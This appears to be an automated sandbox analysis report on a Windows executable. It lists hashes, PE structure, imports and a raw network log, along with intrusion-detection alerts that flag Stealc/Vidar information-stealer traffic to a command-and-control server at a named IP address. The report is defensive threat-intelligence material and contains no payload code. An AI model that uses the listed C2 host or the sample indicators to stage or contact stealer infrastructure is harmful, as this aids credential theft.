                                                                                                                                                                                                                                                Preview:)]}'.["",["carry on movies","michigan wolverines football","canada postal workers strike","december full moon cold moon","helldivers 2 illuminate calypso","wwe saturday night main event","lottery powerball jackpot","georgia bulldogs football"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"google:entityinfo":"CgkvbS8wZnNiXzYSDUZvb3RiYWxsIHRlYW0yyxdkYXRhOmltYWdlL2pwZWc7YmFzZTY0LC85ai80QUFRU2taSlJnQUJBUUFBQVFBQkFBRC8yd0NFQUFrR0J3Z0hCZ2tJQndnS0Nna0xEUllQRFF3TURSc1VGUkFXSUIwaUlpQWRIeDhrS0RRc0pDWXhKeDhmTFQwdE1UVTNPam82SXlzL1JEODRRelE1T2pjQkNnb0tEUXdOR2c4UEdqY2xIeVUzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM04vL0FBQkVJQUVBQVFBTUJFUUFDRVFFREVRSC94QUFiQUFBQkJRRUJBQUFBQUFBQUFBQUFBQUFBQVFNRUJRWUNCLy9FQURZUUFBRURBd01DQXdRSENRQUFBQUFBQUFFQ0F3UUFCUkVHRWlFeFFSTWlVUlFWY1lFV01sSmhsS1BUQnpaVmRJS1JrcUd6LzhRQUdnRUFBd0VCQVFFQUFBQUFBQ
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                Size (bytes):29
                                                                                                                                                                                                                                                Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                Preview:)]}'.{"update":{"promos":{}}}
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                Size (bytes):132978
                                                                                                                                                                                                                                                Entropy (8bit):5.435062797614452
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3072:fPktv3zg+newH5FsYZGFsxIo4EALe13y2i6o:fivn/H/MFsxIoQY3y8o
                                                                                                                                                                                                                                                MD5:5F24D564BB9CC0812379D880572A4287
                                                                                                                                                                                                                                                SHA1:4883609672D919F2B70437AC8A68D69F24471D53
                                                                                                                                                                                                                                                SHA-256:0B974AC6BF8F2DE48CA4ACCCB5A53237547E155041AE385F575C9644BAE00926
                                                                                                                                                                                                                                                SHA-512:05397637B91258532116A8C69D03D5B2CD9170352D1AE96B12DAF2B91D517788C5F78B68B0419EB7EAEB65F4D9858C2BCF90E691988DE6765D76ACC2A9037F9A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Entropy (8bit):6.388427618173688
                                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                File name:dZKPE9gotO.exe
                                                                                                                                                                                                                                                File size:321'024 bytes
                                                                                                                                                                                                                                                MD5:876a365bda09b9ef39605e375d677f0a
                                                                                                                                                                                                                                                SHA1:2c12b38ed2d84722cf5dcea8bd45cfa7d7b55ba4
                                                                                                                                                                                                                                                SHA256:ed252fe89ba1243bad21f373c952b16940a0094149b0be50e5c3da9c20a23234
                                                                                                                                                                                                                                                SHA512:2a2df513d61e9b0eeedf099bb6a04962caa5eb31149efc24421bc30236886fc4a60fb7bcabed46069f0a13789ca34d4f21bc02f3c53bd8cf428be399ae63cb7d
                                                                                                                                                                                                                                                SSDEEP:3072:u2ShpWIPJq+l0qwJyLZhOaHgEbR23iLEhO5efjlbDdl75Zsa1bkZ:uxVl0qwIhOAgEbXUjLF
                                                                                                                                                                                                                                                TLSH:2D64AF1322F06C26E6F34B319D3DB7E82A2FF9624E78A65A711C6B2F05711A1C573712
                                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........S...S...S.....f.R...M.t.M...M.e.G...M.s.=...tj..Z...S... ...M.z.R...M.d.R...M.a.R...RichS...........PE..L......e...........
                                                                                                                                                                                                                                                Icon Hash:e83225292b270d31
                                                                                                                                                                                                                                                Entrypoint:0x40185c
                                                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                DLL Characteristics:NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                Time Stamp:0x650B9EDC [Thu Sep 21 01:39:40 2023 UTC]
                                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                                OS Version Major:5
                                                                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                                                                File Version Major:5
                                                                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                                                                Import Hash:28289f2f7e0a533d999708a3ae088e0b
                                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                                call 00007F2210B2BC46h
                                                                                                                                                                                                                                                jmp 00007F2210B282CDh
                                                                                                                                                                                                                                                mov edi, edi
                                                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                                                                                sub esp, 00000328h
                                                                                                                                                                                                                                                mov dword ptr [0043CC18h], eax
                                                                                                                                                                                                                                                mov dword ptr [0043CC14h], ecx
                                                                                                                                                                                                                                                mov dword ptr [0043CC10h], edx
                                                                                                                                                                                                                                                mov dword ptr [0043CC0Ch], ebx
                                                                                                                                                                                                                                                mov dword ptr [0043CC08h], esi
                                                                                                                                                                                                                                                mov dword ptr [0043CC04h], edi
                                                                                                                                                                                                                                                mov word ptr [0043CC30h], ss
                                                                                                                                                                                                                                                mov word ptr [0043CC24h], cs
                                                                                                                                                                                                                                                mov word ptr [0043CC00h], ds
                                                                                                                                                                                                                                                mov word ptr [0043CBFCh], es
                                                                                                                                                                                                                                                mov word ptr [0043CBF8h], fs
                                                                                                                                                                                                                                                mov word ptr [0043CBF4h], gs
                                                                                                                                                                                                                                                pushfd
                                                                                                                                                                                                                                                pop dword ptr [0043CC28h]
                                                                                                                                                                                                                                                mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                                                                                mov dword ptr [0043CC1Ch], eax
                                                                                                                                                                                                                                                mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                                                mov dword ptr [0043CC20h], eax
                                                                                                                                                                                                                                                lea eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                                                mov dword ptr [0043CC2Ch], eax
                                                                                                                                                                                                                                                mov eax, dword ptr [ebp-00000320h]
                                                                                                                                                                                                                                                mov dword ptr [0043CB68h], 00010001h
                                                                                                                                                                                                                                                mov eax, dword ptr [0043CC20h]
                                                                                                                                                                                                                                                mov dword ptr [0043CB1Ch], eax
                                                                                                                                                                                                                                                mov dword ptr [0043CB10h], C0000409h
                                                                                                                                                                                                                                                mov dword ptr [0043CB14h], 00000001h
                                                                                                                                                                                                                                                mov eax, dword ptr [0043A004h]
                                                                                                                                                                                                                                                mov dword ptr [ebp-00000328h], eax
                                                                                                                                                                                                                                                mov eax, dword ptr [0043A008h]
                                                                                                                                                                                                                                                mov dword ptr [ebp-00000324h], eax
                                                                                                                                                                                                                                                call dword ptr [000000C0h]
                                                                                                                                                                                                                                                Programming Language:
                                                                                                                                                                                                                                                • [C++] VS2008 build 21022
                                                                                                                                                                                                                                                • [ASM] VS2008 build 21022
                                                                                                                                                                                                                                                • [ C ] VS2008 build 21022
                                                                                                                                                                                                                                                • [IMP] VS2005 build 50727
                                                                                                                                                                                                                                                • [RES] VS2008 build 21022
                                                                                                                                                                                                                                                • [LNK] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3896c | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x417000 | 0xf430 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x384d0 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x37000 | 0x188 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x356bc | 0x35800 | 52162e877488812884f3cf96e1385846 | False | 0.7683128285630841 | data | 7.203655785812803 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x37000 | 0x224c | 0x2400 | b21a12c061b515b8e2f419547e683b89 | False | 0.3486328125 | data | 5.345517404515869 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3a000 | 0x3dc49c | 0x7000 | fd627e7e10e1dbcf8c41598a6db27b75 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x417000 | 0xf430 | 0xf600 | 0b2ec2c1f7ab33c14b6402d20ed2e3c4 | False | 0.3673145325203252 | data | 4.4176732090446365 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x4220c8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.31023454157782515
RT_ICON | 0x417610 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Turkmen | Turkmenistan | 0.3296908315565032
RT_ICON | 0x4184b8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Turkmen | Turkmenistan | 0.3935018050541516
RT_ICON | 0x418d60 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Turkmen | Turkmenistan | 0.3945852534562212
RT_ICON | 0x419428 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Turkmen | Turkmenistan | 0.4031791907514451
RT_ICON | 0x419990 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Turkmen | Turkmenistan | 0.22074688796680497
RT_ICON | 0x41bf38 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Turkmen | Turkmenistan | 0.24835834896810507
RT_ICON | 0x41cfe0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | Turkmen | Turkmenistan | 0.2778688524590164
RT_ICON | 0x41d968 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Turkmen | Turkmenistan | 0.30319148936170215
RT_ICON | 0x41de48 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Turkmen | Turkmenistan | 0.3805970149253731
RT_ICON | 0x41ecf0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Turkmen | Turkmenistan | 0.5342960288808665
RT_ICON | 0x41f598 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Turkmen | Turkmenistan | 0.6036866359447005
RT_ICON | 0x41fc60 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Turkmen | Turkmenistan | 0.6235549132947977
RT_ICON | 0x4201c8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Turkmen | Turkmenistan | 0.3825046904315197
RT_ICON | 0x421270 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Turkmen | Turkmenistan | 0.375
RT_ICON | 0x421bf8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Turkmen | Turkmenistan | 0.42730496453900707
RT_STRING | 0x423140 | 0x47a | data | | | 0.4424083769633508
RT_STRING | 0x4235c0 | 0xc8 | data | | | 0.57
RT_STRING | 0x423688 | 0x6a8 | data | | | 0.43133802816901406
RT_STRING | 0x423d30 | 0x600 | data | | | 0.4303385416666667
RT_STRING | 0x424330 | 0x802 | data | | | 0.41804878048780486
RT_STRING | 0x424b38 | 0x75e | data | | | 0.4268292682926829
                                                                                                                                                                                                                                                RT_STRING0x4252980x56cdata0.4546109510086455
                                                                                                                                                                                                                                                RT_STRING0x4258080x6cedata0.4293915040183697
                                                                                                                                                                                                                                                RT_STRING0x425ed80x556data0.44363103953147875
                                                                                                                                                                                                                                                RT_GROUP_CURSOR0x422f700x14data1.25
                                                                                                                                                                                                                                                RT_GROUP_ICON0x4220600x68dataTurkmenTurkmenistan0.7115384615384616
                                                                                                                                                                                                                                                RT_GROUP_ICON0x41ddd00x76dataTurkmenTurkmenistan0.6610169491525424
                                                                                                                                                                                                                                                RT_VERSION0x422f880x1b4data0.5688073394495413
| DLL | Import |
| --- | --- |
| KERNEL32.dll | SetDefaultCommConfigA, GetNumaProcessorNode, DeleteVolumeMountPointA, InterlockedIncrement, InterlockedDecrement, SetComputerNameW, GetProcessPriorityBoost, GetModuleHandleW, GetEnvironmentStrings, LoadLibraryW, GetVersionExW, GetTimeFormatW, GetConsoleAliasW, GetFileAttributesW, GetStartupInfoA, SetLastError, GetProcAddress, SetFileAttributesA, UnregisterWait, ResetEvent, LoadLibraryA, Process32Next, LocalAlloc, GetFileType, AddAtomW, FoldStringW, GetModuleFileNameA, GetModuleHandleA, SetLocaleInfoW, UpdateResourceW, OpenFileMappingW, WriteConsoleOutputAttribute, WriteProcessMemory, BuildCommDCBW, GetCommandLineW, CreateFileA, WriteConsoleW, GetLastError, HeapFree, MultiByteToWideChar, HeapAlloc, GetCommandLineA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, Sleep, ExitProcess, WriteFile, GetStdHandle, SetHandleCount, HeapSize, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, ReadFile, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, SetStdHandle, CloseHandle, WriteConsoleA, GetConsoleOutputCP |
| USER32.dll | GetProcessDefaultLayout |
| GDI32.dll | GetBitmapBits |

| Language of compilation system | Country where language is spoken | Map |
| --- | --- | --- |
| Turkmen | Turkmenistan | |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| 2024-12-16T15:39:38.746601+0100 | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST | 1 | 192.168.2.7 | 49704 | 116.203.12.114 | 443 | TCP |
| 2024-12-16T15:39:41.047529+0100 | 2044247 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config | 1 | 116.203.12.114 | 443 | 192.168.2.7 | 49711 | TCP |
| 2024-12-16T15:39:43.453157+0100 | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | 1 | 116.203.12.114 | 443 | 192.168.2.7 | 49720 | TCP |

                                                                                                                                                                                                                                                Dec 16, 2024 15:39:38.746767998 CET49704443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:38.746820927 CET49704443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:38.747176886 CET49704443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:38.747205019 CET44349704116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:38.753397942 CET49711443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:38.753423929 CET44349711116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:38.753509998 CET49711443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:38.753802061 CET49711443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:38.753813982 CET44349711116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:40.158210993 CET44349711116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:40.158344030 CET49711443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:40.158811092 CET49711443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:40.158818007 CET44349711116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:40.160706043 CET49711443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:40.160713911 CET44349711116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:41.047322989 CET44349711116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:41.047353983 CET44349711116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:41.047436953 CET44349711116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:41.047482014 CET49711443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:41.047482014 CET49711443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:41.047509909 CET49711443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:41.048000097 CET49711443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:41.048015118 CET44349711116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:41.057014942 CET49720443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:41.057045937 CET44349720116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:41.057116985 CET49720443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:41.057367086 CET49720443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:41.057378054 CET44349720116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:42.475197077 CET44349720116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:42.475274086 CET49720443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:42.475781918 CET49720443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:42.475799084 CET44349720116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:42.477514982 CET49720443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:42.477535963 CET44349720116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:43.452955961 CET44349720116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:43.453049898 CET44349720116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:43.453078032 CET49720443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:43.453114986 CET49720443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:43.453406096 CET49720443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:43.453421116 CET44349720116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:43.554090023 CET49728443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:43.554136992 CET44349728116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:43.554198027 CET49728443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:43.554420948 CET49728443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:43.554433107 CET44349728116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:44.545432091 CET49731443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:44.545455933 CET44349731116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:44.545536995 CET49731443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:44.545717955 CET49731443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:44.545732975 CET44349731116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:44.973723888 CET44349728116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:44.973818064 CET49728443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:44.977415085 CET49728443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:44.977427006 CET44349728116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:44.986054897 CET49728443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:44.986063957 CET44349728116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:44.986135006 CET49728443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:44.986141920 CET44349728116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:45.971925020 CET44349731116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:45.972976923 CET49731443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:45.979466915 CET49731443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:45.979485035 CET44349731116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:45.989841938 CET49731443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:45.989862919 CET44349731116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:46.005137920 CET44349728116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:46.005223036 CET49728443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:46.005253077 CET44349728116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:46.005274057 CET44349728116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:46.005319118 CET49728443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:46.006330013 CET49728443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:46.006352901 CET44349728116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:46.996907949 CET44349731116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:46.996972084 CET49731443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:46.996984005 CET44349731116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:46.997024059 CET49731443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:47.068209887 CET49731443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:47.068232059 CET44349731116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:47.917007923 CET49743443192.168.2.7172.217.21.36
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:47.917061090 CET44349743172.217.21.36192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:47.917175055 CET49743443192.168.2.7172.217.21.36
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:47.917370081 CET49743443192.168.2.7172.217.21.36
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:47.917387962 CET44349743172.217.21.36192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:48.358654022 CET49748443192.168.2.7172.217.21.36
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:48.358705044 CET44349748172.217.21.36192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:48.358794928 CET49748443192.168.2.7172.217.21.36
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:48.359033108 CET49748443192.168.2.7172.217.21.36
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:48.359060049 CET44349748172.217.21.36192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:48.421747923 CET49749443192.168.2.7172.217.21.36
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:48.421797991 CET44349749172.217.21.36192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:48.421870947 CET49749443192.168.2.7172.217.21.36
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:51.336292982 CET44349748172.217.21.36192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:51.336354971 CET49748443192.168.2.7172.217.21.36
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:51.336371899 CET44349748172.217.21.36192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:51.346343994 CET44349748172.217.21.36192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:51.346396923 CET49748443192.168.2.7172.217.21.36
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:51.346412897 CET44349748172.217.21.36192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:51.401316881 CET49748443192.168.2.7172.217.21.36
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:51.408427954 CET44349748172.217.21.36192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:51.412703037 CET44349748172.217.21.36192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:51.412784100 CET49748443192.168.2.7172.217.21.36
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:51.412825108 CET44349748172.217.21.36192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:51.420139074 CET44349748172.217.21.36192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:51.420203924 CET49748443192.168.2.7172.217.21.36
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:51.420213938 CET44349748172.217.21.36192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:51.420227051 CET44349748172.217.21.36192.168.2.7
